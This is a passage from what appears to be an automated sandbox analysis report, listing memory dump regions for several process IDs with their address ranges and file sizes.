                                                                                                                                                                            • memory/224-297-0x000001BF3C170000-0x000001BF3C1C2000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              328KB

                                                                                                                                                                            • memory/224-379-0x000001BF571C0000-0x000001BF576E8000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.2MB

                                                                                                                                                                            • memory/224-298-0x000001BF55B10000-0x000001BF55C1A000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.0MB

                                                                                                                                                                            • memory/224-299-0x000001BF3C3A0000-0x000001BF3C3B2000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              72KB

                                                                                                                                                                            • memory/224-300-0x000001BF55960000-0x000001BF5599C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              240KB

                                                                                                                                                                            • memory/224-306-0x00007FF794520000-0x00007FF7946CE000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.7MB

                                                                                                                                                                            • memory/224-365-0x000001BF55A00000-0x000001BF55A50000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              320KB

                                                                                                                                                                            • memory/316-1753-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/316-1752-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/316-1755-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/2220-2424-0x00007FF73AD00000-0x00007FF73AE50000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.3MB

                                                                                                                                                                            • memory/2220-171-0x00007FF73AD00000-0x00007FF73AE50000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.3MB

                                                                                                                                                                            • memory/2324-103-0x0000000000D70000-0x0000000000DD5000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              404KB

                                                                                                                                                                            • memory/2436-26-0x0000000000210000-0x00000000006CC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/2436-29-0x0000000000210000-0x00000000006CC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/2540-896-0x00007FF6F0830000-0x00007FF6F09DE000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.7MB

                                                                                                                                                                            • memory/2604-1750-0x0000000000E80000-0x0000000000EE0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              384KB

                                                                                                                                                                            • memory/2736-165-0x0000000002CF0000-0x0000000002CF5000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              20KB

                                                                                                                                                                            • memory/2736-166-0x0000000002CF0000-0x0000000002CF5000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              20KB

                                                                                                                                                                            • memory/2932-471-0x00000000009E0000-0x0000000000CF1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.1MB

                                                                                                                                                                            • memory/2932-1737-0x00000000009E0000-0x0000000000CF1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.1MB

                                                                                                                                                                            • memory/3032-2571-0x0000000000660000-0x0000000000B0C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/3032-2718-0x0000000000660000-0x0000000000B0C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/3032-2719-0x0000000000660000-0x0000000000B0C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/3124-1757-0x00007FFBFF7A0000-0x00007FFC0187A000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              32.9MB

                                                                                                                                                                            • memory/3124-1756-0x00000000648C0000-0x000000006496A000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              680KB

                                                                                                                                                                            • memory/3444-27-0x00000000002F0000-0x0000000000605000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.1MB

                                                                                                                                                                            • memory/3444-21-0x00000000002F0000-0x0000000000605000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.1MB

                                                                                                                                                                            • memory/3480-263-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-996-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-277-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-255-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-253-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-1327-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-252-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-282-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-289-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-1027-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-1026-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-305-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-292-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-296-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-326-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3480-304-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              164KB

                                                                                                                                                                            • memory/3764-276-0x0000000000FD0000-0x000000000146B000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.6MB

                                                                                                                                                                            • memory/3764-385-0x0000000000FD0000-0x000000000146B000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.6MB

                                                                                                                                                                            • memory/4020-156-0x0000000000400000-0x0000000000436000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              216KB

                                                                                                                                                                            • memory/4020-158-0x0000000005000000-0x000000000509C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              624KB

                                                                                                                                                                            • memory/4020-172-0x0000000005AD0000-0x0000000005B36000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              408KB

                                                                                                                                                                            • memory/4020-188-0x00000000064E0000-0x0000000006572000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              584KB

                                                                                                                                                                            • memory/4704-389-0x0000000007230000-0x0000000007252000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              136KB

                                                                                                                                                                            • memory/4704-348-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              120KB

                                                                                                                                                                            • memory/4704-388-0x00000000072A0000-0x0000000007336000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              600KB

                                                                                                                                                                            • memory/4704-327-0x0000000002830000-0x0000000002866000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              216KB

                                                                                                                                                                            • memory/4704-328-0x0000000004F80000-0x00000000055A8000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.2MB

                                                                                                                                                                            • memory/4704-331-0x0000000004EB0000-0x0000000004F16000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              408KB

                                                                                                                                                                            • memory/4704-369-0x0000000006260000-0x000000000627A000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              104KB

                                                                                                                                                                            • memory/4704-368-0x0000000007500000-0x0000000007B7A000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.5MB

                                                                                                                                                                            • memory/4704-330-0x0000000004E10000-0x0000000004E32000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              136KB

                                                                                                                                                                            • memory/4704-332-0x0000000005830000-0x0000000005B84000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.3MB

                                                                                                                                                                            • memory/4704-349-0x0000000006350000-0x000000000639C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              304KB

                                                                                                                                                                            • memory/4928-362-0x000001AD7F890000-0x000001AD7F8B0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              128KB

                                                                                                                                                                            • memory/4976-153-0x00000000007B0000-0x00000000007FE000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              312KB

                                                                                                                                                                            • memory/4976-154-0x0000000005890000-0x0000000005E34000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.6MB

                                                                                                                                                                            • memory/5260-397-0x00000000005C0000-0x0000000000A7C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/5260-410-0x00000000005C0000-0x0000000000A7C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/5296-408-0x0000000006520000-0x000000000656C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              304KB

                                                                                                                                                                            • memory/5296-407-0x0000000005B00000-0x0000000005E54000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.3MB

                                                                                                                                                                            • memory/5560-422-0x0000000005F60000-0x0000000005FAC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              304KB

                                                                                                                                                                            • memory/5564-585-0x0000000000D30000-0x00000000011EC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/5564-738-0x0000000000D30000-0x00000000011EC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB

                                                                                                                                                                            • memory/5740-2584-0x0000000000CF0000-0x000000000118B000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.6MB

                                                                                                                                                                            • memory/5740-2741-0x0000000000CF0000-0x000000000118B000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.6MB

                                                                                                                                                                            • memory/7488-2736-0x0000000001440000-0x00000000014A5000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              404KB